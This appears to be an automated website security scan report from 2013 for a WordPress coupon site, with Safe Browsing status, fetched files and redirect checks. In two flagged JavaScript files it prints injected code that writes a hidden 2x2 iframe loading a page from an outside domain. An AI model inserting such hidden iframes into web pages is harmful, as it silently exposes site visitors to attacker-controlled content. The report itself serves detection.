Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newmanscoupons.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://newmanscoupons.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 01 Oct 2013 03:32:38 GMT Pragma: no-cache Location: http://www.newmanscoupons.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=2768a883c96cf6b1e7245473b4938097; path=/ X-Pingback: http://www.newmanscoupons.com/xmlrpc.php | clean |
http://www.newmanscoupons.com/ | 200 OK Content-Length: 14041 Content-Type: text/html | clean |
http://www.newmanscoupons.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 465 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hwhi.html?j=1308153></iframe>');
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajaxmint.com/hwhi.html?j=1308153 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hwhi.html?j=1308153> | ||
http://www.newmanscoupons.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/javascript | clean |
http://www.newmanscoupons.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 943 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hwhi.html?j=1308153></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajaxmint.com/hwhi.html?j=1308153 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hwhi.html?j=1308153> | ||
http://www.newmanscoupons.com/wp-content/themes/arjuna-x/default.js?ver=3.1.2 | 200 OK Content-Length: 9706 Content-Type: application/javascript | clean |
http://walls89.hopfeed.com/script/hopfeed.js | 500 Can't connect to walls89.hopfeed.com:80 (Bad hostname) Content-Length: 185 Content-Type: text/plain | clean |
http://walls89.hopfeed.com/test404page.js | 500 Can't connect to walls89.hopfeed.com:80 (Bad hostname) Content-Length: 185 Content-Type: text/plain | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 9028 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newmanscoupons.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Oct 2013 03:32:38 GMT
Pragma: no-cache
Location: http://www.newmanscoupons.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2768a883c96cf6b1e7245473b4938097; path=/
X-Pingback: http://www.newmanscoupons.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: newmanscoupons.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Oct 2013 03:32:38 GMT
Pragma: no-cache
Location: http://www.newmanscoupons.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2768a883c96cf6b1e7245473b4938097; path=/
X-Pingback: http://www.newmanscoupons.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: newmanscoupons.com
Referer: http://www.google.com/search?q=newmanscoupons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: newmanscoupons.com
Referer: http://www.google.com/search?q=newmanscoupons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.